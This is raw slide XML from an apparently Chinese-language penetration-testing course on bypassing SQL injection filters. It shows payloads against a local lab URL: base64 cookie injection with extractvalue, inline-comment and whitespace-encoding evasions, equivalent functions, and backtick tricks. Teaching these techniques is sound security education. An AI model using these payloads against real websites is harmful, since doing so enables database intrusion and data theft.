          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、编码（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>url,hex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>base64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(3)base64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>编码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://127.0.0.1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>cepo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>base64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>编码）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>: admin1')and extractvalue(1,concat(0x7e,(select @@basedir),0x7e))#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="32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5.4</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678832" y="4049688"/>
            <a:ext cx="20954328" cy="4154984"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、注释符（普通注释符，内联注释）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）普通注释符</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>常见的注释符：//, -- , /**/, #, --+,--  -, ;--a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>,-- #</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> /**/：常用于替换空格</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>#、--+：用于注释掉后面不需要的内容</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5.4.1</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606824" y="4049688"/>
            <a:ext cx="20882320" cy="4154984"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、注释符（普通注释符，内联注释）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）内联注释 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>: /*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>！</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>content*/  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>特有）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>常用于规避关键字的检查</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>例：127.0.0.1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>cepo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/?id=-1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> /*!union*/ select 1,2,3--+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>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5.5</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894856" y="3370106"/>
            <a:ext cx="22034448" cy="7540526"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、等价函数与命令</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>有些函数或命令因其关键字被检测出来而无法使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，可以通过使用对应的等价的函数或命令进行替换</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>常用等价函数：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>hex()、bin() ==&gt; ascii()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sleep() ==&gt;benchmark()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>concat_ws()==&gt;group_concat()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>mid()、substr() ==&gt; substring()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>@@user ==&gt; user()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>@@datadir ==&gt; datadir()</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5.5.1</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750840" y="3423284"/>
            <a:ext cx="21674408" cy="8217634"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、等价函数与命令</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>有些函数或命令因其关键字被检测出来而无法使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，可以通过使用对应的等价的函数或命令进行替换</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>常用等价符号：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>==&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> &amp;&amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>==&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>||</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>等于号 ==&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>like ,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>大于，小于</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>空格==&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%20  %09  %0a  %0b  %0c  %0d  %a0  /**/  + -  .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>例：127.0.0.1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>cepo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/?id=-1'/**/union/**/select/**/1,2,3--+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    127.0.0.1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>cepo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/?id=1'%0band%0b1%0blike%0b1--+</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11641"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什么是渗透测试</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1504591" y="2389533"/>
            <a:ext cx="21374818" cy="1815882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>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渗透测试没有一个标准的定义，现有的已达成共识的通用说法是：渗透测试是模拟恶意黑客的攻击方法，来评估计算机网络安全系统的一种评估方法。从最初的交互和信息收集，直到最终的后渗透攻击并形成报告，渗透测试是一个渐进且逐步深入的过程，在这个过程中，渗透测试要选择不影响业务系统正常运行的攻击方法进行的测试。渗透测试的最终目的是发现和挖掘系统中存在的漏洞并提醒网络所有者，做到防患于未然。本系列将介绍渗透测试的完整的流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6 </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606824" y="3905673"/>
            <a:ext cx="22538504" cy="5509200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、特殊符号</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、反引号（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>``</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）：常用于规避正则对关键词检查</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>select `version()`</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、加号，减号，点（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>+ - .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可用于连接字符串，常用于替换空格，拆分关键词</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>se+lec+t+id-1+1.from users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799288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7</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绕过汇总</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1303709" y="3669031"/>
            <a:ext cx="22409570" cy="7540526"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、参数污染（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>hpp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
